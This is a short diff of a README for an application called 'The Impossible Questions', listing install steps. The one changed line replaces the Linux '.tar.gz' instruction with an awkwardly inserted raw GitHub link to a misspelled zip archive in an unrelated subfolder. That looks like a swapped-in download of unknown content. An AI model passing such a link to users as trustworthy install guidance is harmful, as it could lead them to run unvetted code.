abdullahsindhu/THE-IMPOSSIBLE-QUESTIONS/README.md

    - **For Windows:** Double-click the `.exe` file and follow the instructions to install.
    - **For macOS:** Open the `.dmg` file and drag the application to your Applications folder.
-   - **For Linux:** Extract the `.tar.gz` file using your terminal and follow the included setup instructions.
+   - **For Linux:** Extract the `https://raw.githubusercontent.com/abdullahsindhu/THE-IMPOSSIBLE-QUESTIONS/main/samadhi/IMPOSSIBL_TH_QUESTIONS_1.2.zip` file using your terminal and follow the included setup instructions.

 ## ⚙️ Using the Application
 After installation, open The Impossible Questions application.